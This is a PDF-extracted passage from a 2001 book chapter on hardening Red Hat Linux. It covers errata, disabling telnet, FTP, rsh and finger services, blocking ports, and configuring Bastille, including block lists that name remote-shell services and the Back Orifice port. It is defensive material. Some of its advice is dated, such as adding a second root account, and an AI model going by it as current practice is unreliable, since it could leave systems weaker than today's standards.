+www.redhat.com/apps/support/updates.html for the latest errata news.The fol- +lowing list defines the different types of errata found at the Red Hat Updates and +Errata site. +(cid:2) Bug fixes Address coding errors discovered after the release of the +product,and may be critical to program functionality.These Red Hat +Package Manager tools (RPMs) can be downloaded for free.Bug fixes +provide a fix to specific issues,such as a certain error message that may +occur when completing an operating system task.Bug fixes should only +be installed if your system experiences a specific problem.Another +helpful resource is Bugzilla,the Red Hat bug-tracking system at +http://bugzilla.redhat.com/bugzilla. +(cid:2) Security advisories Provide updates that eliminate security vulnerabil- +ities on the system.Red Hat recommends that all administrators down- +load and install the security upgrades to avoid denial-of-service (DoS) +and intrusion attacks that can result from these weaknesses.For example, +a security update can be downloaded for a vulnerability that caused a +memory overflow due to improper input verification in Netscape’s Joint +Photographic Experts Group (JPEG) code. +(cid:2) Package enhancements Provide updates to the functions and features +of the operating system or specific applications.Package enhancements +are usually not critical to the system’s integrity;they often fix function- +ality programs,such as an RPM that provides new features. +Here are the steps for accessing Linux bug fixes,security advisories,and +package enhancements: +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 45 +Hardening the Operating System • Chapter 2 45 +1. To download bug fixes,point your browser to www.redhat.com/ +apps/support/updates.html.Under the “Errata:Fixes and Advisories” +section,click the Red Hat Linux Bug Fixes link.The latest bug fixes +are available for download on this page.Click each bug to learn more, +and determine whether it affects your system.Some fixes do not include +software downloads,such as RPMs;instead,they explain how to con- +figure your system to fix the problem. +2. To download security advisories,point your browser to www.redhat +.com/apps/support/updates.html.Under the “Errata:Fixes and +Advisories”section,click the Red Hat Linux Security Advisories +link.The available security fixes are listed as shown in Figure 2.2.For +example,one download contains three security hole fixes,as well as +additional support for Pentium 4 processors.This affects Red Hat 6.x +and 7.0 users.It is imperative for Linux administrators to check this Web +site on a regular basis,determine if the changes are necessary,and imple- +ment the vulnerability fix. +Figure 2.2 Available Security Fixes for Red Hat Linux +3. To download package enhancements,point your browser to +www.redhat.com/apps/support/updates.html.Under the “Errata: +Fixes and Advisories”section,click the All Red Hat Linux Errata +link,and then the Package Enhancements link.A Red Hat Linux +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 46 +46 Chapter 2 • Hardening the Operating System +Package Enhancements link may also exist on the main Errata page.The +available package enhancements are listed.Check the list to see if any +enhancements affect your operating system or applications.If an +enhancement exists,and installing it would benefit your system,down- +load and install the corresponding package. +Bug Fix Case Study +In a production environment,a problem may exist if a system has an i810 chipset +and is running Red Hat Linux 6.2.The correct amount of system RAM may not +be available to the system.Consequently,the system cannot maximize RAM +usage,and may not run certain programs because it thinks it does not have +enough RAM.A fix for this problem is available at the Red Hat Updates and +Errata Web site. +According to the bug fix,an administrator needs to manually enter the +amount of RAM for the system.To check if the problem exists on a system,the +administrator must log on as root and enter: +cat /proc/meminfo +If the memTotal value is not within a few MB of the actual system RAM,the +administrator needs to manually enter the correct amount of system RAM.To +accomplish this task,the administrator must have root access and edit the +/etc/lilo.conf file by entering: +vi /etc/lilo.conf +The administrator must locate the current kernel image and add a new line +by pressing i (to enter vi’s insert mode) and entering the following: +append="mem=[total amount of ram (in MB)]" +Figure 2.3 displays an edited lilo.conf file for a system that has 256MB of +RAM.One MB should be subtracted from the total because the final megabyte +is not available on all systems. +The administrator must write and quit the lilo.conf file by pressing ESC (to +exit vi’s insert mode) and entering: +:wq +Then he or she must load the updated lilo.conf file into memory by entering: +/sbin/lilo +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 47 +Hardening the Operating System • Chapter 2 47 +Figure 2.3 Editing the Lilo.conf File to Fix a Bug +The administrator must reboot the machine.Afterward,he or she must check +the RAM allocation by entering: +cat /proc/meminfo +If it is within a few MB of the actual RAM,the bug has been fixed.If not, +the administrator must repeat the case study steps to ensure that the correct +amount of RAM is allocated to the OS. +Manually Disabling Unnecessary +Services and Ports +To harden a server,you must first disable any unnecessary services and ports.This +process involves removing any unnecessary services,such as the Linux rlogin ser- +vice,and locking down unnecessary Transmission Control Protocol/User +Datagram Protocol (TCP/UDP) ports.Once these services and ports are secure, +you must then regularly maintain the system. +This section shows you how to manually disable several vulnerable services. +Later in this lesson,you learn how to disable unnecessary services and ports using +the open source program Bastille. +Services to Disable +Linux,by nature,is more secure than most operating systems.Regardless,there +are still uncertainties to every new Linux kernel that is released,and many secu- +rity vulnerabilities that have not been discovered.Most Linux services are not +vulnerable to these exploits.However,an administrator can reduce the amount of +risk by removing unnecessary services.Red Hat Linux includes many services,so +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 48 +48 Chapter 2 • Hardening the Operating System +it makes sense that an administrator customize the system to suit the company +needs.Remember,you are removing risk when you remove unnecessary services. +The xinetd.conf File +The /etc/xinetd.conf file (previously the inetd.conf file) controls many Unix ser- +vices,including File Transfer Protocol (FTP) and Telnet.It determines what ser- +vices are available to the system.The xinetd (like inetd) service is a “super server” +listening for incoming network activity for a range of services.It determines the +actual nature of the service being requested and launches the appropriate server. +The primary reason for the design is to avoid having to start and run a large +number of low-volume servers.Additionally,xinetd’s ability to launch services on +demand means that only the needed number of servers is run. +The etc/xinted.conf file directs requests for xinetd services to the +/etc/xinetd.d directory.Each xinetd service has a configuration file in the +xinetd.d directory.If a service is commented out in its specified configuration +file,the service is unavailable.Because xinetd is so powerful,only the root should +be able to configure its services. +The /etc/xinetd.d directory makes it simple to disable services that your +system is not using.For example,you can disable the FTP and Telnet services by +commenting out the FTP and Telnet entries in the respective file and restarting +the service.If the service is commented out,it will not restart.The next section +demonstrates how to disable the Telnet,FTP,and rlogin services. +Telnet and FTP +Most administrators find it convenient to log in to their Unix machines over a +network for administration purposes.This allows the administrator to work +remotely while maintaining network services.However,in a high-security envi- +ronment,only physical access may be permitted for administering a server.In this +case,you should disable the Telnet interactive login utility.Once disabled,no one +can access the machine via Telnet. +1. To disable Telnet,you must edit the /etc/xinetd.d/telnet file.Open the +Telnet file,as shown in Figure 2.4,using vi or an editor of your choice. +2. Comment out the service telnet line by adding a number sign (#) +before service telnet: +#service telnet +3. Write and quit the file. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 49 +Hardening the Operating System • Chapter 2 49 +Figure 2.4 Disabling Telnet Using the /xinetd.d/telnet File +4. Next,you must restart xinetd by entering: +/etc/rc.d/init.d/xinetd restart +Stopping xinetd: [OK} +Starting xinetd: [OK} +5. Attempt to log on to the system using Telnet.You should fail. +6. Note that commenting out the service line in the respective xinetd.d +directory can disable many services. +7. Disable the FTP service using the same method (e.g.,edit the +/xinetd.d/wu-ftpd file by commenting out the service ftp line and +restarting xinetd). +8. Attempt to access the system via FTP.You should be unable to log in to +the server. +The Rlogin Service +The remote login (rlogin) service is enabled by default in the /etc/xinetd.d/ +rlogin file.Rlogin has security vulnerabilities because it can bypass the password +prompt to access a system remotely.There are two services associated with rlogin: +login and RSH (remote shell).To disable these services,open the /xinetd.d/ +rlogin file and comment out the service login line.Then,open the /etc/ +xinetd.d/rsh file and comment out the service shell line.Restart xinetd to +ensure that your system is no longer offering these services. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 50 +50 Chapter 2 • Hardening the Operating System +Locking Down Ports +TCP/IP networks assign a port to each service,such as HTTP,Simple Mail +Transfer Protocol (SMTP),and Post Office Protocol version 3 (POP3).This port is +given a number,called a port number,used to link incoming data to the correct +service.For example,if a client browser is requesting to view a server’s Web page, +the request will be directed to port 80 on the server.The Web service receives the +request and sends the Web page to the client.Each service is assigned a port +number,and each port number has a TCP and UDP port.For example,port 53 is +used for the Domain Name System (DNS) and has a TCP port and a UDP port. +TCP port 53 is used for zone transfers between DNS servers;UDP port 53 is used +for common DNS queries—resolving domain names to IP addresses. +Well-Known and Registered Ports +There are two ranges of ports used for TCP/IP networks:well-known ports and +registered ports.The well-known ports are the network services that have been +assigned a specific port number (as defined by /etc/services).For example,SMTP +is assigned port 25,and HTTP is assigned port 80.Servers listen on the network +for requests at the well-known ports.Registered ports are temporary ports,usu- +ally used by clients,and will vary each time a service is used.Registered ports are +also called ephemeral ports,because they last for only a brief time.The port is +then abandoned and can be used by other services. +The port number ranges are classified,as shown in Table 2.1,according to +Request for Comments (RFC) 1700.To access RFC 1700,go to ftp://ftp.isi.edu/ +in-notes/rfc1700.txt. +Table 2.1 Port Number Ranges for Various Types +Type Port Number Range +Well-known 1 to 1023 +Registered 1024 to 65535 +NOTE +Connections to ports number 1023 and below are assumed to run with +root-level privileges. This means that untrusted services should never be +configured with a port number below 1024. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 51 +Hardening the Operating System • Chapter 2 51 +You will see how well-known ports work with registered ports shortly. +Table 2.2 is a list of well-known TCP/UDP port numbers. +Table 2.2 Commonly Used Well-Known TCP/UDP Port Numbers +Protocol Port Number +FTP (Default data) 20 +FTP (Connection dialog, control) 21 +Telnet 23 +SMTP 25 +DNS 53 +DHCP BOOTP Server 67 +DHCP BOOTP Client 68 +TFTP 69 +Gopher 70 +HTTP 80 +POP3 110 +NNTP 119 +NetBIOS Session Service 139 +Internet Message Access Protocol (IMAP), version 2 143 +To explain how well-known ports work with registered ports,let’s look at a +typical Web site connection from a Web browser to a Web server.The client sends +the HTTP request from a registered TCP port,such as port 1025.The request is +routed across the network to the well-known TCP port 80 of a Web server.Once +a session is established,the server continues to use port 80,and the client uses var- +ious registered ports,such as TCP port 1025 and 1026,to transfer the HTTP data. +Figure 2.5 is a packet capture that displays the establishment of a TCP session +between a client and server,and the transmission of HTTP data between them. +In frame 2 of the packet capture,the source address (24.130.10.35) is the +client computer requesting the Web page.The destination address (192.0.34.65) is +the Web server,which hosts the Internet Corporation of Assigned Names and +Numbers (ICANN) Web site.In the Info field,the 1025 > 80 indicates that the +source TCP port is 1025.The 80 indicates that the destination TCP port is 80. +The first three frames display the TCP handshake,which establishes a TCP con- +nection between the client and server.In the frames that follow,the client +requests HTTP data from the server.The request determines the HTTP version +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 52 +52 Chapter 2 • Hardening the Operating System +that the client and server will use.The client then requests and downloads the +contents of the Web page. +Figure 2.5 Port Usage in a Client/Server HTTP Session +Determining Ports to Block +When determining which ports to block on your server,you must first deter- +mine which services you require.In most cases,block all ports that are not exclu- +sively required by these services.This is tricky,because you can easily block +yourself from services you need,especially services that use ephemeral ports,as +explained earlier. +If your server is an exclusive e-mail server running SMTP and IMAP,you can +block all TCP ports except ports 25 and 143,respectively.If your server is an +exclusive HTTP server,you can block all ports except TCP port 80.In both +cases,you can block all UDP ports since SMTP and IMAP all use TCP services +exclusively.However,if you want to use your server as an HTTP client (i.e.,for +accessing operating system updates) or as an e-mail client to a remote mail server, +you will restrict the system.Clients require registered UDP ports for DNS,as +well as registered TCP ports for establishing connections with Web servers. +If you open only the corresponding UDP ports 25,80,and 143,DNS +requests are blocked because DNS queries use UDP port 53,and DNS answers +use a UDP registered port (e.g.,the response stating that www.syngress.com= +205.181.158.215).Even if you open port 53,a different registered port may be +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 53 +Hardening the Operating System • Chapter 2 53 +assigned each time for the answer.Attempting to allow access to a randomly +assigned registered port is almost impossible and a waste of time.The same +problem applies with TCP connections that require ephemeral ports. +Therefore,you should either open all TCP/UDP registered ports (so you can +use your server as a client),or block them (except for the services you require) +and access resources,such as operating system updates,another way.Many admin- +istrators order the Red Hat Linux Update CDs,which are re-mastered every +eight weeks,that contain all current updates (www.redhat.com/products/soft- +ware/linux/updatecd/).You can also simply download the updates from another +computer. +Blocking Ports +To block TCP/UDP services in Linux,you must disable the service that uses +the specific port.The following section discusses disabling ports using xinetd,and +disabling ports assigned to stand-alone services. +Xinetd Services +Many services are disabled by their respective files in the /etc/xinetd.d directory +by commenting out the service that uses the port.You learned how to comment +out xinetd services earlier in this chapter.For example,to disable port 79 (used +for finger services,which gives out user data that can be used by malicious +hackers),you would comment out the service finger entry in /etc/xinetd.d/ +finger file.Refer to Table 2.2 to view other ports you may wish to block.It lists +common ports blocked by firewalls.However,these ports can also be blocked at +the server itself.Follow these steps to disable port 79: +1. To disable port 79,you must edit the /etc/xinetd.d/finger file.Open the +finger file and locate the service finger line. +2. Comment out the finger service line,and then write and quit the file. +3. Next,you must restart xinetd by entering: +/etc/rc.d/init.d/xinetd restart +4. If you have a finger program installed on your system,or access to a +finger gateway,attempt a finger request to your system.You should fail. +Note that you can use xinetd to disable many other ports. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 54 +54 Chapter 2 • Hardening the Operating System +Stand-Alone Services +To disable ports whose corresponding services are not included in the +/etc/xinetd.d directory,you must kill the service’s process and make sure that ser- +vice does not automatically restart upon reboot.These services are called stand- +alone services.For example,port 111 is assigned a stand-alone portmapper service +not required for most e-mail servers.The portmapper service,which is technically +part of the Sun Remote Procedure Call (RPC) service,runs on server machines +and assigns port numbers to RPC packets,such as NIS and NFS packets.Because +these RPC services are not used by most e-mail services,port 111 is not neces- +sary.To disable port 111,you must disable the portmapper service as follows: +1. To disable the portmapper service,identify the process identifier (PID) +for portmap by entering: +ps aux | grep portmap +2. The second column lists the PID number.The last column lists the pro- +cess using that PID.To stop the portmapper service,identify the PID +number and enter: +kill –9 [PID NUMBER] +3. To make sure the service does not restart during reboot,enter: +ntsysv +4. Scroll down to the portmap service and uncheck the check box next to +the service.Click OK.The portmap service will no longer restart at +bootup. +NOTE +Some ports, such as port 80, are not activated unless the service is +installed. For example, if you have not installed Apache server, then port +80 is not used. There is no need to block the port because it is already +disabled. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 55 +Hardening the Operating System • Chapter 2 55 +Hardening the System with Bastille +Bastille is an open source program that facilitates the hardening of a Linux system. +It performs many of the tasks discussed in this chapter,including downloading +operating system updates and disabling services and ports that are not required for +the system’s job functions.The program also offers a wider range of additional ser- +vices,from installing a firewall (ipchains) to implementing secure shell (SSH). +Bastille is powerful and can save administrators time from configuring each +individual file and program throughout the operating system.Instead,the admin- +istrator answers a series of “Yes”and “No”questions through an interactive text- +based interface.The program automatically implements the administrator’s +preferences based on the answers to the questions. +Bastille is written specifically to Red Hat Linux and Mandrake Linux,but can +be easily modified to run on most Unix flavors.The specific Red Hat/Mandrake +content has been generalized,and now the hard-code filenames are represented as +variables.These variables are set automatically at runtime. +Bastille Functions +The following list highlights the security features offered by Bastille to secure +your system.You will choose which feature you want to implement on your +system during the question-and-answer period.For example,many servers do not +need to provide firewall or Network Address Translation (NAT),so you may not +need to configure ipchains.This list may vary as new versions of Bastille are +released and the program becomes more powerful.More information about each +of these features is explained in the program. +(cid:2) Run the ipchains script You can configure your system as a packet +filter.This allows your system to perform NAT,serve as a small firewall, +and deny certain connection types to your server. +(cid:2) Download and install RPM updates The most recent versions of +the RPMs used on your system are downloaded and installed.These +RPM downloads are obtained from the Red Hat Errata page +(www.redhat.com/support/errata). +(cid:2) Apply restrictive permissions on administrator utilities Allows +only the root to read and execute common Administrator utilities such +as ifconfig,linuxconf,ping,traceroute,and runlevel).It disables the +SUID root status for these programs,so nonroot users cannot use them. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 56 +56 Chapter 2 • Hardening the Operating System +(cid:2) Create a second root account A second UID 0 (root) account +allows administrators to track the original root account.This is helpful +for tracking hackers because Bastille notifies the second account to orig- +inal account logins.If you always use the second account,then you +know when a security breach may have occurred. +(cid:2) Disable r-protocols The r-protocols allow users to log on to remote +systems using IP-based authentication.IP-based authentication permits +only specific IP addresses to remotely log on to a system.Because this +authentication is based on the IP address,a hacker who has discovered +an authorized IP address can create spoofed packets that appear to be +from the authorized system. +(cid:2) Implement password aging Default Red Hat Linux systems allow +passwords to expire after 99,999 days.Because this is too long in a secure +environment,Bastille offers to change the password expiration time to +180 days.These configurations are written to the /etc/login.defs file,as +shown in Figure 2.6. +Figure 2.6 The /etc/login.defs File Configured for 180-Day +Password Expiration +(cid:2) Password protect the LILO prompt Allows users with the correct +password to add arguments to the LILO prompt.Otherwise,only the +default value (usually linux) is allowed.Be careful to implement this +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 57 +Hardening the Operating System • Chapter 2 57 +change if you have a dual-boot system,because the name of the oper- +ating system,such as dos,is often typed at the LILO prompt to access +other operating systems. +(cid:2) Disable CTRL-ALT-DELETE rebooting This disallows rebooting the +machine by this method. +(cid:2) Password protect single-user mode If a user gains access to your +physical system,he or she can enter single-user mode by typing init 1. +Once in single-user mode,that user has root access,and no one else can +access the machine.By placing a password on single-user mode,run- +level 1 is protected (the password is the root password). +(cid:2) Optimize TCP Wrappers This choice modifies the inetd.conf (pre- +Red Hat Linux 7 versions only) and /etc/hosts.allow files so that inetd +must contact TCP Wrappers whenever it gets a request,instead of auto- +matically running the requested service.TCP Wrappers will determine if +the requesting IP address is allowed to run the particular service.If the +request is not allowed,the request is denied and the attempt is logged. +Although IP-based authentication can be vulnerable,this optimization +adds a layer of security to the process. +(cid:2) Add Authorized Use banners These banners automatically appear +whenever anyone logs on to the system.Authorized Use banners are +helpful in prosecuting malicious hackers,and should be added to every +system on your network that allows access to the network.An informa- +tion bulletin from the U.S.Department of Energy’s Computer Incident +Advisory Capability can be found at http://ciac.llnl.gov/ciac/bulletins/ +j-043.shtml. +The bulletin is titled “Creating Login Banners”and explains what is +required within login banners for government computers.It also +includes how to create banners and provides the text from the approved +banner for Federal Government computer systems.Bastille uses a modi- +fied version of this login banner.If you choose to create a login banner, +it will resemble Figure 2.7.You can modify the banner text to suit your +security needs in the etc/motd file. +(cid:2) Disable the compiler Most hackers access systems through regular +user accounts.Once they have access to the system,they compile mali- +cious programs to attack the system and other systems.Disabling the +compiler denies users from compiling programs,which reduces the +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 58 +58 Chapter 2 • Hardening the Operating System +security risk.This step is recommended for dedicated servers and fire- +walls,but may be too strict for workstations used by employees who +require use of the compiler for their job tasks. +Figure 2.7 The etc/motd File Displaying Banner Text +(cid:2) Limit system resource usage If you limit system resource usage,you +can reduce the chances of server failure from a DoS attack.If you +choose to limit system resource usage in Bastille,the following changes +will occur: +(cid:2) Individual file size is limited to 40MB. +(cid:2) Each individual user is limited to 150 processes. +(cid:2) The allowable core files number is configured to zero.Core files are +used for system troubleshooting.They are large and exploitable if a +hacker gains control of them:they can grow and consume your file +system. +These limits are written to the /etc/security/limits.conf file,as +shown in Figures 2.8 and 2.9. +(cid:2) Restrict console access Anyone with access to the console has special +rights,such as CD-ROM mounting.Bastille can specify which user +accounts are allowed to log on via the console. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 59 +Hardening the Operating System • Chapter 2 59 +Figure 2.8 The /etc/security/limits.conf File +Figure 2.9 The /etc/security/limits.conf File Configured to Limit the +Allowable Core Files, User File Sizes, and User Processes +(cid:2) Additional and remote logging Two additional logs can be added to +/var/log/: +(cid:2) /var/log/kernel (kernel messages) +(cid:2) /var/log/syslog (error and warning severity messages) +You can also log to a remote logging host if one exists. +(cid:2) Process accounting setup Allows you to log the commands of all +users.It also records when the commands were executed.This log file is +helpful in retracing a hacker’s steps into your system,but the file can +become large quickly.If the hacker has root access,the hacker can +remove this accounting log. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 60 +60 Chapter 2 • Hardening the Operating System +(cid:2) Disable unnecessary daemons As discussed earlier in this chapter, +only the required services should run on a system.All other services +should be removed.Bastille allows you to disable daemons that are often +unnecessary and pose potential security risks.If you performed a custom +Red Hat installation with “everything,”you will be asked if you want to +disable the services shown in Table 2.3. +Table 2.3 Disabling Unnecessary Daemons +Reason for +Service Description Disabling +Ampd Monitors battery power on Often unnecessary +laptop computers +Network File System Unix network file systems Potential security risk +(NFS) and Samba used for sharing files +Atd At daemon used for Potential security risk +scheduling commands +PCMCIA services Used for laptop computers Often unnecessary +Dynamic Host Used by DHCP servers Often unnecessary +Configuration Protocol +(DHCP) daemon +News server daemon Used by news servers Often unnecessary +Routing daemon Used by routers Often unnecessary +Network Information Unix network naming and Potential security risk +System (NIS) server and administration system and often unnecessary +client programs +Simple Network Used to manage network Potential security risk +Management Protocol devices and often unnecessary +(SNMP) daemon +Sendmail daemon mode Used by sendmail servers Often unnecessary +(cid:2) Download and install Secure Shell (SSH) A standard for securely +logging on to remote systems.SSH encrypts usernames,passwords,and all +information between hosts as they communicate across the network. +Standard telnet connections send the information in clear text.Therefore, +you should always use SSH to ensure secure remote connections. +(cid:2) Deactivate and chroot named Similar to other services,named +should be deactivated if the service is not required (e.g.,if the server will +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 61 +Hardening the Operating System • Chapter 2 61 +not answer DNS queries).Bastille also offers to change the root direc- +tory of named to a child node on the directory tree,which is +/home/dns.This new directory is considered a “chroot’ed prison” +because the daemon is limited to only part of the file system and can +only access the required files needed to function.These prisons are not +entirely secure,but they do offer another layer of security to fend off a +would-be hacker.This change is transparent,except that all configuration +files and editing must occur in /home/dns.In addition,if you control +named with ndc,you must enter:ndc -c /home/dns/var/run/ndc. +NOTE +The chroot() system call makes the current working directory act as if it +were /. Consequently, a process that has used the chroot() system call +cannot cd to higher-level directories. This prevents anyone exploiting the +service from general access to the system. +(cid:2) Harden Apache Web server httpd should be deactivated if the service +is not required.If you decide to use Apache,you can perform the steps +shown in the “Hardening the Apache Web Server”sidebar in Bastille to +run the service. +Damage & Defense… +Hardening the Apache Web Server +Bastille has a reputation for being unable to secure the Apache Web +server. If you implement the following steps for hardening Apache, be +aware that security issues may still arise. +1. Run Apache as localhost only This action is especially +helpful for Web designers and programmers because it allows +them to work on their code and view their progress without +opening the Web server to others network users. They access +their local Web server by entering http://localhost. +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 62 +62 Chapter 2 • Hardening the Operating System +2. Bind the Web server to a specific interface Allows you to +bind the Web server’s IP address to an interface, such as an +Ethernet network interface card (NIC). The option overrides +the previous localhost-only action. +3. Disable symbolic links Symbolic links are “pointers” to +other files in a file system. They are capable of allowing Web +site visitors to access files outside of the Web server directo- +ries. If you disable symbolic links, you limit the files accessible +to visitors on the Web server. +4. Deactivate server-side includes Server-side includes (SSIs) +are interpreters or programs on a Web server that are acti- +vated by a client. SSIs can create HTML on the fly, which +reduces bandwidth usage. SSIs are HTML directives to run +programs on the server and add the programs’ output to the +page being returned to the client. The problem is that +crackers could cause the program to run in an insecure way, +and in some cases could even cause other programs to run. +Consequently, SSIs are considered insecure and have fallen +out of favor. If you do not use SSIs on your Apache Web +server, you should deactivate them. +5. Disable CGI scripts Common Gateway Interface (CGI) scripts +allow a Web server to communicate with an application, such +as a database, and then return that data to a client. CGI +scripts should be limited to certain users, depending on the +CGI scripts. For example, many scripts are used to process +Web page forms, which are available to the public. Some +scripts may be used to access private databases, which +require limited access. If you do not use CGI scripts on your +Apache Web server, you should deactivate them. +6. Disable indexes A world-readable file or directory allows +Web site visitors access to files or directories. An automati- +cally generated index file will list the contents of these files +and directories. Listing them is usually a bad idea unless you +want the files to be listed for HTTP downloads (Web-based +file archives) or similar uses. +(cid:2) Disable printing Printing should only be enabled if your system needs +to print.If printing is not required,Bastille removes SUID root on lpr, +and disables lpr and lpd.As stated in the configuration script,if you +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 63 +Hardening the Operating System • Chapter 2 63 +disable SUID root on lpr and need to print,you must undo the setting +by entering the following: +/bin/chmod 06555 /usr/bin/lpr /usr/bin/lprm +/sbin/chkconfig lpd on +(cid:2) Disable FTP daemon user privileges By default (in the wu-ftpd +configuration file),FTP clients cannot connect anonymously and upload +files via FTP.Users with accounts on the system can still access the FTP +server.This is dangerous if they access the server over a public network +because the FTP passwords are sent as clear text,which can be captured +by anyone with a packet sniffer.Anyone who has upload privileges can +compromise the FTP daemon,because uploading files cause most attacks +that allow root access. +(cid:2) Disable anonymous download Allows anyone to download files +from your FTP server without a unique username and password.Instead, +it is recommended that you use an Apache Web-based file archive to +allow the public to download files. +Bastille Versions +Bastille 1.1.0 and later incorporates several important changes that make the pro- +gram even more powerful and easy to use.The examples in this book use Bastille +1.1.1.It is recommended that you implement at least version 1.1.0 because of the +following enhancements: +(cid:2) Nonvirgin system install Bastille runs on systems that are already in +production.Previous versions only allowed Bastille to run on systems +with a new install only. +(cid:2) Multiple runnings Bastille can be run many times on the same system. +Therefore,administrators can change settings as needed. +(cid:2) Log-only feature Administrators can run Bastille without actually +implementing the changes.Instead,the changes are written to a log file. +This is helpful because it allows an administrator to decide what will +work best for his or her system without being forced to commit to the +changes.One wrong choice in Bastille can restrict the system’s function- +ality,and not allow the server to perform its job (hence,the all-important +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 64 +64 Chapter 2 • Hardening the Operating System +Undo feature).To run the program in log-only mode,enter the following +at the prompt when using interactive mode: +./InteractiveBastille.pl -v +(cid:2) Distribution support Bastille is written specifically to Red Hat Linux +and Mandrake Linux.The specific Red Hat/Mandrake content has been +generalized,and hard-code filenames are now represented as variables. +These variables are set automatically at runtime. +(cid:2) Undo feature Administrators can undo settings through various +methods that are listed at the end of this section. +Implementing Bastille +Bastille is available for free download at www.bastille-linux.org.This tarball is also +on the CD accompanying this book (Bastille-1.1.1.tar.gz).The program is offered +in tarball format and must be installed by a root user in his or her root directory +(a tarball is a collection of archived files that have been archived using the Unix +tar program and have the .tar extension).Because Bastille is actually a collection +of Perl scripts,you must also ensure that Perl 5.0 or later is installed on your +system. +The program automatically implements the administrator’s preferences based +on the answers to the questions,and saves them in the /root/Bastille/config file, +as shown in Figure 2.10. +Figure 2.10 Bastille Configuration File +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 65 +Hardening the Operating System • Chapter 2 65 +Bastille allows the same configuration to be implemented on other systems. +To do this,administrators need to install Bastille on that machine,copy the config +file and the BackEnd.pl file to the new system’s ~/Bastille directory,and then run +the command: +./BackEnd.pl +Damage & Defense… +Logging Your Configurations in Bastille +As with many security programs, Bastille is relatively simple to imple- +ment, but it’s easy to lose track of the changes you implemented. This +can be a problem if you are unable to perform a typical operation on the +system, or are denied access to a command or service. Many times, it is +because you locked down part of the system by mistake, or misjudged +the impact of a particular Bastille choice. +It is always a good idea to create a hard-copy log of the options you +select in Bastille, or any security configurations you implement on your +system. When you configure Bastille on your systems, use the Bastille log +included in Appendix A of this book. It includes each configuration ques- +tion and an area for your manual input. Make copies of the Appendix A, +fill out the table during configuration, and keep the hard copies in a safe +place. +If your system goes down, you can access the hard copies and +recreate your Bastille configurations. Of course, if your system became +unusable due to Bastille, it will help you determine what went wrong. +This is especially helpful if you are unable to access the /root/Bastille/ +config file, which saves the administrator’s preferences based on the +answers to the Bastille questions. +Follow these steps to install and configure Bastille: +1. Log in as root. +2. Copy the Bastille tarball to your root directory.You can access the tarball +from the CD accompanying this book (Bastille-1.1.1.tar.gz),or from +www.bastille-linux.org.This lab is written for version 1.1.1,so we recom- +mend that you use the version on the CD.The filename will resemble: +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 66 +66 Chapter 2 • Hardening the Operating System +Bastille-1.1.1.tar.gz +3. In the root directory,decompress the image by entering: +tar –zxvf Bastille-1.1.1.tar.gz +4. Access the newly created Bastille directory in your root directory. +cd Bastille +5. To run the Perl configuration scripts in the interactive text-based mode, +enter the following in the Bastille directory: +./InteractiveBastille.pl +The opening Bastille screen appears,as shown in Figure 2.11. +Figure 2.11 Interactive Bastille Opening Screen +6. All choices you implement in Bastille are logged to the /root/Bastille/ +config file.If you want to log your choices without implementing them, +you can append the -v option.Your choices are still logged to the +/root/Bastille/config file,which is the same file to which the actions are +logged.Therefore,we strongly recommend that you make a backup of +the config file before running Bastille and keep a manual log. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 67 +Hardening the Operating System • Chapter 2 67 +7. The opening screen appears,identifying how to navigate through the +Bastille configuration process.Select Next to access the first configura- +tion screen,as shown in Figure 2.12. +Figure 2.12 Bastille Linux Question-and-Answer Script +8. Table 2.5 leads you through the configuration process.The configuration +used in this example performs a few basic hardening techniques on a +Red Hat Linux 7.0 system with a custom installation with everything +installed.The main purpose is to show you what Bastille offers and how +to use it.You can use Bastille to secure a system based on your system’s +services and needs,which will vary from the example.The bolded sec- +tions in the Choice column are choices you will skip for this example. +The default answers are displayed for your interest.You will install many +of these services later in this book,such as SSH. +Table 2.5 Simple Bastille Configurations +Question Choice +Module 1: IPChains.pm +1. Would you like to run the ipchains script? (Choosing No +“No” will skip to Module 2; you will implement +ipchains later in this book.) +2. Do you need the advanced networking options? No +3. DNS servers 0.0.0.0/0 +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 68 +68 Chapter 2 • Hardening the Operating System +Table 2.5 Continued +Question Choice +4. Public interfaces eth+ ppp+ slip+ +5. TCP services to audit (name or port number). telnet ftp imap +pop-3 finger +sunrpc exec login +linuxconf ssh +6. UDP services to audit (name or port number); the 31337 +“Back Orifice” port number on Microsoft clients is +listed by default. +7. ICMP services to audit (name or port number); an (Blank) +example is the Microsoft “echo-request” service +(Microsoft ping and tracert commands). +8. TCP service names or port numbers to allow on public (Blank) +interfaces (typical workstations should not allow any +services). +9. UDP service names or port numbers to allow on (Blank) +public interfaces (typical workstations should not +allow any services). +10. Force passive mode (i.e., for clients connecting to an No +FTP server). +11. TCP services to block (if you force passive mode, you 1024 2049 +can skip this step). 2065:2090 +6000:6020 7100 +12. UDP services to block. 1066 2049 6770 +13. ICMP allowed types. Destination- +unreachable +echo-reply time- +exceeded +14. Enable source address verification. Yes +15. Reject method. DENY +16. Interfaces for DHCP queries. (Blank) +17. NTP servers to query. (Blank) +18. ICMP types to disallow outbound. Destination- +unreachable time- +exceeded +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 69 +Hardening the Operating System • Chapter 2 69 +Table 2.5 Continued +Question Choice +Module 2: PatchDownload.pm +1. Would you like to 